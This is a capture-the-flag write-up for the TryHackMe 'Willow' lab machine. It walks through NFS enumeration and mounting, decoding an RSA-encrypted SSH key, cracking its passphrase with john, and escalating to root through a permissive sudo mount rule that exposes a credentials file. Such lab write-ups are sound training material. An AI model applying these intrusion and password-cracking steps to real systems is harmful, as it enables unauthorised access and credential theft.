Willow — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Willow — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -T4 -p- -v <ip>
There are 4 ports opened: 22 (SSH), 80 (HTTP), 111 (RPC), and 2049 (NFS).
As nfs is running, let’s check what directory can be mounted:
showmount -e <ip>
So, /var/failsafe can be mounted by any computers on this network(the * dedicates that). Let’s mount this folder to see what’s inside.
Follow these commands:
mkdir /tmp/willow
mount -t nfs 10.10.229.81:/var/failsafe /tmp/willow
Now cd to /tmp/willow to see what’s inside /var/failsafe:
And the content of “rsa_keys”:
Well, up to now, I don’t know what those numbers mean, so just leave it there first.
Next, let’s access its website on port 80:
So many numbers here! It looks like an encrypted string. I’ll use http://icyberchef.com/ to decrypt.
Ok the rest of the number is Willow’s private key, but encrypted by RSA algorithm. Look at the hint, I know the format to decrypt is:
Public Key: (e, n)
Private Key: (d, n)
And look back at the “rsa_keys”, I know what “e, d, n” is:
e: 23
d: 61527
n: 37267
And the format to decrypt:
decrypted = (encrypted ** d) % n
So, let’s write some simple code using the format above to decrypt this RSA. You can find my code here.
After run, I’ve got the private key:
Now crack the password of this key using john:
ssh2john rsakey.txt > johnrsa.txt
john — wordlist=rockyou.txt johnrsa.txt
I’ve got the password. chmod 600 rsakey.txt to make that private key usable. Then login to SSH using the private key and the password above.
ssh -i rsakey.txt willow@<ip>
I’m in!
There is a “user.jpg” inside willow’s home folder. Looks like it’ll be the 1st flag. Transfer it to your machine using scp. From your machine:
scp -i rsakey.txt willow@10.10.229.81:/home/willow/user.jpg /home/<your-username>
The image will be your flag!
Now I’ll find a way to own root and get the final flag.
First, sudo -l to see if willow can run sudo:
Well, willow can run mount /dev/* without password needed. So let’s see what’s inside /dev:
There’s a “hidden_backup” file. Let’s mount it to willow home to see what’s inside:
mkdir /home/willow/hidden && sudo mount /dev/hidden_backup /home/willow/hidden
Well there’s a “creds.txt” file. Inside it is root’s password! su root using this password and get the final flag!
Oh wait!! the root.txt is not the final flag!
Wait a min, I haven’t extracted anything from the “user.jpg”, right? Maybe there’s something suspicious there! Let’s extract the hidden data using steghide:
steghide extract -sf user.jpg
Then paste the root’s password and the hidden data is extracted! It will be your root’s flag.
The end.
HAPPY HACKING